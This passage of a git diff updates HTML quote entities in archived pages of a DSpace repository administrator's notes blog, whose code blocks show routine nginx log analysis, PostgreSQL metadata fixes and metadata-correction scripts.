| awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 92 40.77.167.4 99 210.7.29.100 120 38.126.157.45 @@ -979,7 +979,7 @@ sys 0m1.979s <li>I added the new CCAFS Phase II Project Tag <code>PII-FP1_PACCA2</code> and merged it into the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/379">#379</a>)</li> <li>I proofed and tested the ILRI author corrections that Peter sent back to me this week:</li> </ul> -<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n +<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3 -n </code></pre><ul> <li>I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in <a href="https://alanorth.github.io/cgspace-notes/cgspace-notes/2018-03/">March, 2018</a></li> <li>Time to index ~70,000 items on CGSpace:</li> @@ -1073,11 +1073,11 @@ sys 2m7.289s <li>I notice this error quite a few times in dspace.log:</li> </ul> <pre tabindex="0"><code>2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets -org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered &quot; &quot;]&quot; &quot;] &quot;&quot; at line 1, column 32. +org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976+TO+1979]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32. </code></pre><ul> <li>And there are many of these errors every day for the past month:</li> </ul> -<pre tabindex="0"><code>$ grep -c &quot;Error while searching for sidebar facets&quot; dspace.log.* +<pre tabindex="0"><code>$ grep -c &#34;Error while searching for sidebar facets&#34; dspace.log.* dspace.log.2017-11-21:4 dspace.log.2017-11-22:1 dspace.log.2017-11-23:4 @@ -1155,12 +1155,12 @@ dspace.log.2018-01-02:34 <ul> <li>Today there have been no hits by CORE and no alerts from Linode (coincidence?)</li> </ul> -<pre tabindex="0"><code># grep -c &quot;CORE&quot; /var/log/nginx/access.log +<pre tabindex="0"><code># grep -c &#34;CORE&#34; /var/log/nginx/access.log 0 </code></pre><ul> <li>Generate list of authors on CGSpace for Peter to go through and correct:</li> </ul> -<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv; +<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv; COPY 54701 </code></pre> @@ -1289,7 +1289,7 @@ COPY 54701 <li>Remove redundant/duplicate text in the DSpace submission license</li> <li>Testing the CMYK patch on a collection with 650 items:</li> </ul> -<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &quot;ImageMagick PDF Thumbnail&quot; -v &gt;&amp; /tmp/filter-media-cmyk.txt +<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt </code></pre> @@ -1330,7 +1330,7 @@ COPY 54701 <ul> <li>An item was mapped twice erroneously again, so I had to remove one of the mappings manually:</li> </ul> -<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = '80278'; +<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = &#39;80278&#39;; id | collection_id | item_id -------+---------------+--------- 92551 | 313 | 80278 @@ -1370,11 +1370,11 @@ DELETE 1 <li>CGSpace was down for five hours in the morning while I was sleeping</li> <li>While looking in the logs for errors, I see tons of warnings about Atmire MQM:</li> </ul> -<pre tabindex="0"><code>2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;) -2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&quot;dc.title&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;) -2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&quot;THUMBNAIL&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;) -2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&quot;-1&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;) -2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;) +<pre tabindex="0"><code>2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&#34;dc.title&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&#34;THUMBNAIL&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&#34;-1&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;) </code></pre><ul> <li>I see thousands of them in the logs for the last few months, so it&rsquo;s not related to the DSpace 5.5 upgrade</li> <li>I&rsquo;ve raised a ticket with Atmire to ask</li> @@ -1429,7 +1429,7 @@ DELETE 1 <li>We had been using <code>DC=ILRI</code> to determine whether a user was ILRI or not</li> <li>It looks like we might be able to use OUs now, instead of DCs:</li> </ul> -<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &quot;dc=cgiarad,dc=org&quot; -D &quot;admigration1@cgiarad.org&quot; -W &quot;(sAMAccountName=admigration1)&quot; +<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;admigration1@cgiarad.org&#34; -W &#34;(sAMAccountName=admigration1)&#34; </code></pre> @@ -1465,9 +1465,9 @@ $ git rebase -i dspace-5.5 <li>Add <code>dc.description.sponsorship</code> to Discovery sidebar facets and make investors clickable in item view (<a href="https://github.com/ilri/DSpace/issues/232">#232</a>)</li> <li>I think this query should find and replace all authors that have &ldquo;,&rdquo; at the end of their names:</li> </ul> -<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$'; +<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^.+?),$&#39;, &#39;\1&#39;) where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;; UPDATE 95 -dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$'; +dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;; text_value ------------ (0 rows) @@ -1505,7 +1505,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and <li>I have blocked access to the API now</li> <li>There are 3,000 IPs accessing the REST API in a 24-hour period!</li> </ul> -<pre tabindex="0"><code># awk '{print $1}' /var/log/nginx/rest.log | uniq | wc -l +<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log | uniq | wc -l 3168 </code></pre> @@ -1603,7 +1603,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and <li>Looks like DSpace exhausted its PostgreSQL connection pool</li> <li>Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:</li> </ul> -<pre tabindex="0"><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace +<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace 78 </code></pre> diff --git a/docs/posts/page/2/index.html b/docs/posts/page/2/index.html index 0a4435a34..a38268cf6 100644 --- a/docs/posts/page/2/index.html +++ b/docs/posts/page/2/index.html @@ -10,14 +10,14 @@ - + - + @@ -221,17 +221,17 @@
                                                                                                                                                                                                                                                                                                                                                                                                • I had a call with CodeObia to discuss the work on OpenRXV
                                                                                                                                                                                                                                                                                                                                                                                                • Check the results of the AReS harvesting from last night:
                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                                                                                                                                                                                                                                                                                                                                                -{
                                                                                                                                                                                                                                                                                                                                                                                                -  "count" : 100875,
                                                                                                                                                                                                                                                                                                                                                                                                -  "_shards" : {
                                                                                                                                                                                                                                                                                                                                                                                                -    "total" : 1,
                                                                                                                                                                                                                                                                                                                                                                                                -    "successful" : 1,
                                                                                                                                                                                                                                                                                                                                                                                                -    "skipped" : 0,
                                                                                                                                                                                                                                                                                                                                                                                                -    "failed" : 0
                                                                                                                                                                                                                                                                                                                                                                                                -  }
                                                                                                                                                                                                                                                                                                                                                                                                -}
                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                                                                                                                                                                                                                                                                                                                                                +{
                                                                                                                                                                                                                                                                                                                                                                                                +  "count" : 100875,
                                                                                                                                                                                                                                                                                                                                                                                                +  "_shards" : {
                                                                                                                                                                                                                                                                                                                                                                                                +    "total" : 1,
                                                                                                                                                                                                                                                                                                                                                                                                +    "successful" : 1,
                                                                                                                                                                                                                                                                                                                                                                                                +    "skipped" : 0,
                                                                                                                                                                                                                                                                                                                                                                                                +    "failed" : 0
                                                                                                                                                                                                                                                                                                                                                                                                +  }
                                                                                                                                                                                                                                                                                                                                                                                                +}
                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                Read more → diff --git a/docs/posts/page/3/index.html b/docs/posts/page/3/index.html index de5efc9b7..93c1f4f9d 100644 --- a/docs/posts/page/3/index.html +++ b/docs/posts/page/3/index.html @@ -10,14 +10,14 @@ - + - + diff --git a/docs/posts/page/4/index.html b/docs/posts/page/4/index.html index 3b8737b61..7722ccf4b 100644 --- a/docs/posts/page/4/index.html +++ b/docs/posts/page/4/index.html @@ -10,14 +10,14 @@ - + - + @@ -113,17 +113,17 @@
                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                            # zcat --force /var/log/nginx/*access.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                            # zcat --force /var/log/nginx/*access.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                             4671942
                                                                                                                                                                                                                                                                                                                                                                                            -# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                            +# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                             1277694
                                                                                                                                                                                                                                                                                                                                                                                             
                                                                                                                                                                                                                                                                                                                                                                                            • So 4.6 million from XMLUI and another 1.2 million from API requests
                                                                                                                                                                                                                                                                                                                                                                                            • Let’s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):
                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                            # zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                            # zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                             1183456 
                                                                                                                                                                                                                                                                                                                                                                                            -# zcat --force /var/log/nginx/rest.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E "/rest/bitstreams"
                                                                                                                                                                                                                                                                                                                                                                                            +# zcat --force /var/log/nginx/rest.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E "/rest/bitstreams"
                                                                                                                                                                                                                                                                                                                                                                                             106781
                                                                                                                                                                                                                                                                                                                                                                                             
                                                                                                                                                                                                                                                                                                                                                                                            Read more → @@ -143,7 +143,7 @@

                                                                                                                                                                                                                                                                                                                                                                                            - 2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script’s “unneccesary Unicode” fix: $ csvcut -c 'id,dc. + 2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script’s “unneccesary Unicode” fix: $ csvcut -c 'id,dc. Read more → @@ -166,7 +166,7 @@
                                                                                                                                                                                                                                                                                                                                                                                          • Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning
                                                                                                                                                                                                                                                                                                                                                                                          • Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                          # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                          # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                               440 17.58.101.255
                                                                                                                                                                                                                                                                                                                                                                                               441 157.55.39.101
                                                                                                                                                                                                                                                                                                                                                                                               485 207.46.13.43
                                                                                                                                                                                                                                                                                                                                                                                          @@ -177,7 +177,7 @@
                                                                                                                                                                                                                                                                                                                                                                                               814 207.46.13.212
                                                                                                                                                                                                                                                                                                                                                                                              2472 163.172.71.23
                                                                                                                                                                                                                                                                                                                                                                                              6092 3.94.211.189
                                                                                                                                                                                                                                                                                                                                                                                          -# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                          +# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                33 2a01:7e00::f03c:91ff:fe16:fcb
                                                                                                                                                                                                                                                                                                                                                                                                57 3.83.192.124
                                                                                                                                                                                                                                                                                                                                                                                                57 3.87.77.25
                                                                                                                                                                                                                                                                                                                                                                                          @@ -338,16 +338,16 @@ DELETE 1
                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                      # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk '{print $9}' | sort | uniq -c | sort -n | tail -n 5
                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                      # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk '{print $9}' | sort | uniq -c | sort -n | tail -n 5
                                                                                                                                                                                                                                                                                                                                                                                          4432 200
                                                                                                                                                                                                                                                                                                                                                                                       
                                                                                                                                                                                                                                                                                                                                                                                      • In the last two weeks there have been 47,000 downloads of this same exact PDF by these three IP addresses
                                                                                                                                                                                                                                                                                                                                                                                      • Apply country and region corrections and deletions on DSpace Test and CGSpace:
                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                      $ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d
                                                                                                                                                                                                                                                                                                                                                                                      -$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d
                                                                                                                                                                                                                                                                                                                                                                                      -$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d
                                                                                                                                                                                                                                                                                                                                                                                      -$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d
                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                      $ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d
                                                                                                                                                                                                                                                                                                                                                                                      +$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d
                                                                                                                                                                                                                                                                                                                                                                                      +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d
                                                                                                                                                                                                                                                                                                                                                                                      +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d
                                                                                                                                                                                                                                                                                                                                                                                       
                                                                                                                                                                                                                                                                                                                                                                                      Read more → @@ -403,7 +403,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
                                                                                                                                                                                                                                                                                                                                                                                    • Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!
                                                                                                                                                                                                                                                                                                                                                                                    • The top IPs before, during, and after this latest alert tonight were:
                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "01/Feb/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "01/Feb/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                         245 207.46.13.5
                                                                                                                                                                                                                                                                                                                                                                                         332 54.70.40.11
                                                                                                                                                                                                                                                                                                                                                                                         385 5.143.231.38
                                                                                                                                                                                                                                                                                                                                                                                    @@ -419,7 +419,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
                                                                                                                                                                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                                                                                                                                  • The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase
                                                                                                                                                                                                                                                                                                                                                                                  • There were just over 3 million accesses in the nginx logs last month:
                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                  # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                  # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
                                                                                                                                                                                                                                                                                                                                                                                   3018243
                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                   real    0m19.873s
                                                                                                                                                                                                                                                                                                                                                                                  diff --git a/docs/posts/page/5/index.html b/docs/posts/page/5/index.html
                                                                                                                                                                                                                                                                                                                                                                                  index 2fcdec928..eb1fac6f4 100644
                                                                                                                                                                                                                                                                                                                                                                                  --- a/docs/posts/page/5/index.html
                                                                                                                                                                                                                                                                                                                                                                                  +++ b/docs/posts/page/5/index.html
                                                                                                                                                                                                                                                                                                                                                                                  @@ -10,14 +10,14 @@
                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                       
                                                                                                                                                                                                                                                                                                                                                                                  @@ -110,7 +110,7 @@
                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                • Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning
                                                                                                                                                                                                                                                                                                                                                                                • I don’t see anything interesting in the web server logs around that time though:
                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                      92 40.77.167.4
                                                                                                                                                                                                                                                                                                                                                                                      99 210.7.29.100
                                                                                                                                                                                                                                                                                                                                                                                     120 38.126.157.45
                                                                                                                                                                                                                                                                                                                                                                                @@ -308,7 +308,7 @@
                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                              • I added the new CCAFS Phase II Project Tag PII-FP1_PACCA2 and merged it into the 5_x-prod branch (#379)
                                                                                                                                                                                                                                                                                                                                                                              • I proofed and tested the ILRI author corrections that Peter sent back to me this week:
                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                              $ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n
                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                              $ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n
                                                                                                                                                                                                                                                                                                                                                                               
                                                                                                                                                                                                                                                                                                                                                                              • I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in March, 2018
                                                                                                                                                                                                                                                                                                                                                                              • Time to index ~70,000 items on CGSpace:
                                                                                                                                                                                                                                                                                                                                                                              • diff --git a/docs/posts/page/6/index.html b/docs/posts/page/6/index.html index de2f18c80..8fa52e3de 100644 --- a/docs/posts/page/6/index.html +++ b/docs/posts/page/6/index.html @@ -10,14 +10,14 @@ - + - + @@ -166,11 +166,11 @@
                                                                                                                                                                                                                                                                                                                                                                              • I notice this error quite a few times in dspace.log:
                                                                                                                                                                                                                                                                                                                                                                              2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
                                                                                                                                                                                                                                                                                                                                                                              -org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered " "]" "] "" at line 1, column 32.
                                                                                                                                                                                                                                                                                                                                                                              +org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered " "]" "] "" at line 1, column 32.
                                                                                                                                                                                                                                                                                                                                                                               
                                                                                                                                                                                                                                                                                                                                                                              • And there are many of these errors every day for the past month:
                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                              $ grep -c "Error while searching for sidebar facets" dspace.log.*
                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                              $ grep -c "Error while searching for sidebar facets" dspace.log.*
                                                                                                                                                                                                                                                                                                                                                                               dspace.log.2017-11-21:4
                                                                                                                                                                                                                                                                                                                                                                               dspace.log.2017-11-22:1
                                                                                                                                                                                                                                                                                                                                                                               dspace.log.2017-11-23:4
                                                                                                                                                                                                                                                                                                                                                                              @@ -266,12 +266,12 @@ dspace.log.2018-01-02:34
                                                                                                                                                                                                                                                                                                                                                                               
                                                                                                                                                                                                                                                                                                                                                                              • Today there have been no hits by CORE and no alerts from Linode (coincidence?)
                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                              # grep -c "CORE" /var/log/nginx/access.log
                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                              # grep -c "CORE" /var/log/nginx/access.log
                                                                                                                                                                                                                                                                                                                                                                               0
                                                                                                                                                                                                                                                                                                                                                                               
                                                                                                                                                                                                                                                                                                                                                                              • Generate list of authors on CGSpace for Peter to go through and correct:
                                                                                                                                                                                                                                                                                                                                                                              -
